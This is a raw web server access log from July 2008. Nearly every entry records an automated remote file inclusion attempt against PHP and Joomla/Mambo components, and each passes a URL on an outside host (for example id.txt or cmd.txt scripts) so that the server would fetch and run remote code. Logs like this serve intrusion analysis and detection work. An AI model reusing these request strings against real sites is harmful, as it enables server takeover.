69.64.80.225 - - [19/Jul/2008:11:20:30 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:20:30 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:20:31 -0700] "GET /logs/access_080110.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.192.48.154 - - [19/Jul/2008:11:20:38 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.243.21 - - [19/Jul/2008:11:21:04 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
124.217.243.21 - - [19/Jul/2008:11:21:04 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/css.txt?? HTTP/1.1" 200 18575 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:21:07 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:21:14 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:21:14 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:21:14 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:21:21 -0700] "GET /logs/access_080313.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:11:21:22 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:11:21:22 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.143.162 - - [19/Jul/2008:11:21:26 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [19/Jul/2008:11:21:26 -0700] "GET /convert/mvcw.php?vwar_root=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:11:21:33 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:11:21:33 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.101.24 - - [19/Jul/2008:11:21:42 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [19/Jul/2008:11:21:42 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:21:43 -0700] "GET /logs/access.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:21:49 -0700] "GET /logs/access_080313.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:21:50 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:21:50 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:22:00 -0700] "GET /logs/access_080528.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:11:22:07 -0700] "GET /logs/access_080218.log/index.php?pag=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:11:22:07 -0700] "GET /logs/access_080218.log/index.php?pag=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:22:21 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:22:25 -0700] "GET /logs/access_080329.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:22:28 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18489 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:22:28 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:22:40 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:22:49 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:22:49 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:22:49 -0700] "GET /logs/access.log%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:22:56 -0700] "GET /logs/access_080313.log%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:22:56 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.28.93 - - [19/Jul/2008:11:22:57 -0700] "GET /index.php?DOCUMENT_ROOT=http://micro101.com/xcart/skin1/file? HTTP/1.1" 200 18415 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:23:04 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:23:04 -0700] "GET /logs/access_080103.log%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:23:04 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:11:23:07 -0700] "GET /logs/access_080218.log/index.php?sub=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:23:09 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:23:12 -0700] "GET /logs/access_080229.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:23:17 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.120.73 - - [19/Jul/2008:11:23:28 -0700] "GET /logs/index.php?option=com_lmo&action=table&tabtype=0&file=uisp_200506.l98&st=9//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://wiki.sertes.nl/tiki/styles/slides/check.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
204.15.120.73 - - [19/Jul/2008:11:23:29 -0700] "GET /index.php?option=com_lmo&action=table&tabtype=0&file=uisp_200506.l98&st=9//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://wiki.sertes.nl/tiki/styles/slides/check.txt%0D? HTTP/1.1" 200 18731 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:23:31 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:23:34 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:23:34 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:23:35 -0700] "GET /logs/access_080313.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:23:36 -0700] "GET /logs/access_080327.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:23:39 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:23:39 -0700] "GET /logs/access_080110.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:23:43 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:23:43 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:23:44 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:23:46 -0700] "GET /logs/access_080319.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:23:49 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:23:52 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:23:57 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18491 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:23:57 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:23:57 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:23:59 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:23:59 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:24:00 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:24:04 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:24:05 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:11:24:12 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:11:24:14 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 200 18471 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:24:21 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:24:22 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.124.139 - - [19/Jul/2008:11:24:23 -0700] "GET /logs/access.log//index.php?slang=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.124.139 - - [19/Jul/2008:11:24:23 -0700] "GET /logs//index.php?slang=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.124.139 - - [19/Jul/2008:11:24:24 -0700] "GET //index.php?slang=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 200 18463 "-" "libwww-perl/5.812" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:24:27 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18507 "-" "libwww-perl/5.65" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:24:30 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.187 - - [19/Jul/2008:11:24:42 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
72.29.70.187 - - [19/Jul/2008:11:24:43 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/css.txt?? HTTP/1.1" 200 18575 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:24:44 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:24:44 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:24:44 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:24:44 -0700] "GET /logs/access_080313.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:24:44 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.117.237.200 - - [19/Jul/2008:11:24:52 -0700] "GET //?path%5Bdocroot%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 200 18411 "-" "libwww-perl/5.79" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:24:53 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:24:58 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18475 "-" "libwww-perl/5.79" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:24:58 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:25:11 -0700] "GET /logs/access_080328.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:25:13 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:25:13 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:25:14 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:11:25:20 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:11:25:20 -0700] "GET /lostpasswd.php?env[include_prefix]=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:25:20 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:11:25:20 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:25:22 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:25:28 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18523 "-" "libwww-perl/5.65" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:25:37 -0700] "GET /logs/access_080313.log%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:25:39 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:11:25:42 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:25:43 -0700] "GET /logs/access_080317.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:25:45 -0700] "GET /logs/access_080513.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:25:46 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18481 "-" "libwww-perl/5.79" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:25:47 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:25:49 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18485 "-" "libwww-perl/5.79" "www.dmulk.com"
